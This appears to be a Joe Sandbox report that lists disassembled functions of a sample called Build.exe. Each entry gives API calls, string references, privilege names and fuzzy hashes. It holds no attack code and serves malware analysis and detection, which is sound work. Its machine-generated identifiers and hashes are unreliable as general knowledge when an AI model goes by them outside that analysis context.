Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: b69d93cc946a88a181cdd730d38a6867d32af63ea0fbf93033e3d1810c8a48d8
Instruction ID: a494cf590e5ca260d7bdba21117c176cda1e114f06162c464e4010b3f4f0be22
Opcode Fuzzy Hash: b69d93cc946a88a181cdd730d38a6867d32af63ea0fbf93033e3d1810c8a48d8
Instruction Fuzzy Hash: 6B5126B5288344FAF6371A948D43F6577ACAB0AF00F10C506B3CE698D1D6BA97407E13

Function 0038A7C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe,00000104), ref: 0038A800
_free.LIBCMT ref: 0038A8CB
_free.LIBCMT ref: 0038A8D5

Strings

C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe, xrefs: 0038A7F7, 0038A7FE, 0038A82D, 0038A865

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe
API String ID: 2506810119-3608859494
Opcode ID: 5469ffc69f6ca27d9e9f54b8ff4212ea53d357f504890dfa4cdcf1bdc2afedb7
Instruction ID: 188666988ad05061b9ff8e14dce486eba52504a1d0e1c6c01c841685ec1a1f8c
Opcode Fuzzy Hash: 5469ffc69f6ca27d9e9f54b8ff4212ea53d357f504890dfa4cdcf1bdc2afedb7
Instruction Fuzzy Hash: 3C314071A00B14EFEB13EB99D885D9EBFFCEB85710F1140A7E5049B211D6709A41DBA2

Function 003857F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0038581B
_abort.LIBCMT ref: 00385926

Strings

RCC, xrefs: 00385835
MOC, xrefs: 0038582D

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: ba6124c979c5a592dbecfb8dd8cf94f84cffa56a74e6c33e6e48b5b5d7535a3f
Instruction ID: c1c85ddccd3615913d9e84901d28d5fe7b157cdc0134b4990151c908134080a7
Opcode Fuzzy Hash: ba6124c979c5a592dbecfb8dd8cf94f84cffa56a74e6c33e6e48b5b5d7535a3f
Instruction Fuzzy Hash: C9413872A0060DEFCF16EFA4CC85AAEBBB5FF48314F198099F914AB221D3359950DB50

Function 0036F7B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0036F82D
_strncpy.LIBCMT ref: 0036F871

Part of subcall function 00373F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0036F801,00000000,00000000,?,003A5070,?,0036F801,?,?,00000050,?), ref: 00373F64

Strings

@%s, xrefs: 0036F817
$%s, xrefs: 0036F822

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: b172af85a0ba67f544e24ffb5d9697594ed071bee76e9c969dec1a4805f5669a
Instruction ID: 54135d146fab4ca2a31e9d55b5ed1fcbceb749c08e40ad29f97a8bee8cab2f0d
Opcode Fuzzy Hash: b172af85a0ba67f544e24ffb5d9697594ed071bee76e9c969dec1a4805f5669a
Instruction Fuzzy Hash: 25218E72900308AFDB22EFA4DC02BAE77A8BB15300F04456AF92597191E772E9058B50

Function 0037CDA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00361366: GetDlgItem.USER32(00000000,00003021), ref: 003613AA
Part of subcall function 00361366: SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0

EndDialog.USER32(?,00000001), ref: 0037CE28
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0037CE3D
SetDlgItemTextW.USER32(?,00000066,?), ref: 0037CE52

Strings

ASKNEXTVOL, xrefs: 0037CDB8

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 3c423bc411407ffca0eec8e09845e8a7f24f9f922d641b62a1c811d828b398b4
Instruction ID: fe235ab4386ffaf114f909fb6b7ec50fb0f501e495d0ad9e2676d513c9de2db9
Opcode Fuzzy Hash: 3c423bc411407ffca0eec8e09845e8a7f24f9f922d641b62a1c811d828b398b4
Instruction Fuzzy Hash: 5C110832254600BFD7339F68DC08F663B6DFB4AB02F048018F649EB5A9C765B901CBA5

Function 00372F22 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0036CAA0,00000008,00000004,0036F1F0,?,00000000), ref: 00372F61
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0036CAA0,00000008,00000004,0036F1F0,?,00000000), ref: 00372F6B
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0036CAA0,00000008,00000004,0036F1F0,?,00000000), ref: 00372F7B

Strings

Thread pool initialization failed., xrefs: 00372F93

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: f39ab2ea52c0aba829a482c49954386b98db17e7ee42b0561287793a4e7aad5a
Instruction ID: 53fadb1b23aed2950c2478dd7650b8d1daff7a925eb4182f57323c36dcec53d3
Opcode Fuzzy Hash: f39ab2ea52c0aba829a482c49954386b98db17e7ee42b0561287793a4e7aad5a
Instruction Fuzzy Hash: 441191B1609708AFC3325F6A9CC4AA7FBECEB95744F51882EF1DAC7200D6B559408B60

Function 003800EF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00380143
REPLACEFILEDLG, xrefs: 0038012E, 00380162

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: e2019b2c5a6c91e5d43bc51f7348c9d5792eb4c4967b800a13dcd8763684d53c
Instruction ID: 5cff3cb91f015abda6370a12720271b194a10d05c32073b8b5bd3e13cb4a4425
Opcode Fuzzy Hash: e2019b2c5a6c91e5d43bc51f7348c9d5792eb4c4967b800a13dcd8763684d53c
Instruction Fuzzy Hash: 2601BC39608204AFDB57AF25EC48EA73BACFB4A7A4F004465F905D3270D7719854DBA0

Function 00364B3D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00364B42

Part of subcall function 0038106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00381079
Part of subcall function 0038106D: ___delayLoadHelper2@8.DELAYIMP ref: 0038109F

std::_Xinvalid_argument.LIBCPMT ref: 00364B4D

Strings

string too long, xrefs: 00364B3D
vector too long, xrefs: 00364B48

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
String ID: string too long$vector too long
API String ID: 2355824318-1617939282
Opcode ID: 656b631b325ecdedd6cd7fc81dfe2e248e2d3434c49000d56aeafa15ccecf8fa
Instruction ID: 985465bde8a7fc768890b64d9245a027ee89c105f51c502d67eb9e01dbddd09d
Opcode Fuzzy Hash: 656b631b325ecdedd6cd7fc81dfe2e248e2d3434c49000d56aeafa15ccecf8fa
Instruction Fuzzy Hash: 72F0A0713103086B8A36AF59DC46C4AB3EDEF85B60B10491AFA85C7605C3B0E94487B1

Function 0036C142 Relevance: 6.1, APIs: 4, Instructions: 135filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00369343,?,?,?), ref: 0036C1EE
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00369343,?,?), ref: 0036C22C
SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00369343,?,?,?,?,?,?,?,?), ref: 0036C2AF
CloseHandle.KERNEL32(00000800,?,?,?,00369343,?,?,?,?,?,?,?,?,?,?), ref: 0036C2B6

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 6604bce305d16f966627f4fb4608d1663c48c798f4bbb192d6ecafa93f959b6f
Instruction ID: 93fdf67b5eecdb60adb33c9213616bf62b4458047b876850de054d47932c0373
Opcode Fuzzy Hash: 6604bce305d16f966627f4fb4608d1663c48c798f4bbb192d6ecafa93f959b6f
Instruction Fuzzy Hash: CE41F1302583819EE722DB64DC65BBBB7E8AF8A700F04481DB4D6D7181C664EA488752

Function 0036BD61 Relevance: 6.1, APIs: 4, Instructions: 126COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0036BD93
_wcslen.LIBCMT ref: 0036BDB6
_wcslen.LIBCMT ref: 0036BE4C
_wcslen.LIBCMT ref: 0036BEB1

Part of subcall function 0036C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,003687BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0036C3A5

Part of subcall function 0036BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 0036BC1C
Part of subcall function 0036BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 0036BC48

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen$DirectoryRemove$CloseFind
String ID:
API String ID: 973666142-0
Opcode ID: 4e081ba596df632a2e78dbe6c51ef1d5e44197f66f7c2b73295c8305e066912e
Instruction ID: 93803f2c18da8dbc86e29443c26949923027fa35a39ca41bdc8862474639c54f
Opcode Fuzzy Hash: 4e081ba596df632a2e78dbe6c51ef1d5e44197f66f7c2b73295c8305e066912e
Instruction Fuzzy Hash: 9941F97250439096CB32AF64A8459EBF3ED9F85300F41C81EEA85D7146DB769DC8CBA1

Function 0036849E Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 112COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000800,?,?,92C77967,00000000,?,00000000), ref: 00368596

Part of subcall function 00368C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00368CB2
Part of subcall function 00368C95: GetLastError.KERNEL32 ref: 00368CF6
Part of subcall function 00368C95: CloseHandle.KERNEL32(?), ref: 00368D05

Strings

SeRestorePrivilege, xrefs: 00368531
SeSecurityPrivilege, xrefs: 0036851C
T8, xrefs: 00368557, 0036857A

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ErrorLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege$T8
API String ID: 1245819386-4115626634
Opcode ID: 1ced3d1935e30b9d779198f5a46513b20974699615e0cf5013b7c68bf4f3c54a
Instruction ID: f6cd6935b9e650077d5f71fe3c1859f0a333c0d5a72df7a3b49900e6c3bf1e62
Opcode Fuzzy Hash: 1ced3d1935e30b9d779198f5a46513b20974699615e0cf5013b7c68bf4f3c54a
Instruction Fuzzy Hash: 6041B471A042489FDF23EF549C42BEE77A8EB4E304F044159FA06EB285DB755E448B61

Function 0038EFD8 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00386F64,00000000,00000000,00387F99,?,00387F99,?,00000001,00386F64,?,00000001,00387F99,00387F99), ref: 0038F025
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0038F0AE
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0038F0C0
__freea.LIBCMT ref: 0038F0C9

Part of subcall function 0038BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00386A24,?,0000015D,?,?,?,?,00387F00,000000FF,00000000,?,?), ref: 0038BCC0

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 6a8c37fe0d4d2933428c14ce2ad807fdf9963b4f0687321c6268630781433271
Instruction ID: 4bd12a482cdbd32139f51a2c99acc77d7c9076a8e8af17125ba50577e4fe0dbd
Opcode Fuzzy Hash: 6a8c37fe0d4d2933428c14ce2ad807fdf9963b4f0687321c6268630781433271
Instruction Fuzzy Hash: D631C0B1A0030A9FDF26AF64DC41DAE7BA9EB40310F1542A9FC04DB192E736DD54CB90

Function 0037C5F3 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0037C5F6
GetDeviceCaps.GDI32(00000000,00000058), ref: 0037C605
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037C613
ReleaseDC.USER32(00000000,00000000), ref: 0037C621

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7cfefce14c07a7eecc027de4c5e001d2417cae76fa35efef1b4b07a70f3923a2
Instruction ID: 70dd561211a494b409ed0e332fe0a29dd1de2326210ef5b045110e2b53669a21
Opcode Fuzzy Hash: 7cfefce14c07a7eecc027de4c5e001d2417cae76fa35efef1b4b07a70f3923a2
Instruction Fuzzy Hash: E5E0EC71999664A7D3231B62AC1DF963B5CEB1A713F095005FE05D6290CA7458008FD4

Function 0037D76E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0037D7D1
_wcslen.LIBCMT ref: 0037D7EC

Strings

}, xrefs: 0037D7C4

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: ddb5bd8618f3c56b3f004205e312ad60c678131fab5337e9a86fdd51eca518fa
Instruction ID: 1bf19b166bdad1928da72d34527b6a9912bc8155a6faa580a13bae577368c7e4
Opcode Fuzzy Hash: ddb5bd8618f3c56b3f004205e312ad60c678131fab5337e9a86fdd51eca518fa
Instruction Fuzzy Hash: 1B21F1329043496AD733EF64D845A6BB3FCEF85710F41446AF588C7141EA64E84883E3

Function 0037CEBF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0037D392: GetCurrentProcess.KERNEL32(00020008,?), ref: 0037D3A1
Part of subcall function 0037D392: GetLastError.KERNEL32 ref: 0037D3CC

CreateDirectoryW.KERNEL32(?,?), ref: 0037CF61
LocalFree.KERNEL32(?), ref: 0037CF6F

Strings

8, xrefs: 0037CF20

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
String ID: 8
API String ID: 1077098981-502372171
Opcode ID: 83a0359c35018e6746dcf231d9f22aab569915ee9e8a92d91979c5299ed038e9
Instruction ID: abe7205d77b9ce2f812650850de6150cac93bcb05cb6da701c33b5858b573d2c
Opcode Fuzzy Hash: 83a0359c35018e6746dcf231d9f22aab569915ee9e8a92d91979c5299ed038e9
Instruction Fuzzy Hash: A221D6B1900209ABDB11DFA5D9859EFBBFCFF45340F50812AF815E2250E735DA15CBA0

Function 0036D8AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0036D8D3

Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13

Strings

%c:\, xrefs: 0036D8C9

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

